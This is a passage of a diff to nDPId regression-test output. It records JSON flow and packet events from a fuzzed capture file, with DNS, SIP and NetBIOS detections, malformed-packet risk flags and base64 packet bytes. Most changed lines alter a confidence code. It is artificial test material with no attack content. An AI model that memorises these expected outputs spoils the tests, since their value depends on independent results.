-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1120470509447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470509447,"pkt":"ADBUADRWAODtAW69CABFAABEeHUAAIARS+DAqAECwKgBAQroADUAMOPqQOwAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1120470509449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470509449,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEB8KgBAgA1CugAR8ZmQOyAAABkAAEAAAAAATEBMAEwAzEyNwdpbi1hGmRyBGFycGEAAFcAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470509599} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470509450,"pkt":"AODtAW69ADBUADRWCABFAEMGAABAADcRiifU8iEjwKgBAhPEE8QB8vKXU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOjM1MTA0NzIzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zNzBkOGU1DQpUbzogPHNpcDozNTEwNDcyM2pzaXAuY3liZSljaXR5LmRrPjt0YWc9MDAtMDQwODMtMTcwMWI2ZGQtMDUxZjVkYzMxDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNo4uMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTUuNzA7cnBvcnQ9NTA2MDticmFuY2g9ejloRzRiS25wNTc3MjYxOTctNDg0MWM3Y2QxOTIuMTY4LjEuMvQKV1dXLUF1dGhlbnRpY2F0ZTogRGlnZXN0IHJlYWxtPSJzaXAuY3lzZXJjaXR5LmRrIixub25jZT0iMTcwMWI2Y2MxY2JjOTBkMzI4ZmUxZjFhMzFhMmM0ZSIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLHN0YWxlPWZhbHNlLGFsZ29yaXRobT1NRDUNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -862,20 +862,20 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1120470588783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470588783,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa3oAAO8RStPAqAECwKgBcACJAIkAOltehT0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ\/VDQUJNAAAoAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1120470589532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470589532,"pkt":"\/\/\/\/\/\/\/3AODtAW69CABFAABOa3sAAIARStLAiAECwKgB\/wCJAIkAOltehT0BEAABAAAAAAAAIERGRURFSkZQRUVFUEVORUNFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470385615,"flow_last_seen":1120470394622,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470636050} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470590283,"pkt":"\/\/\/\/\/\/\/\/AODtAW5LCABFAJxOa4EAAIARSszAqAECwKgB\/wCJAIkAOltZhUIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFTkVPYkFDQUNBekFDQUJNAAAgAAE="} @@ -885,7 +885,7 @@ 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":464,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470637551,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 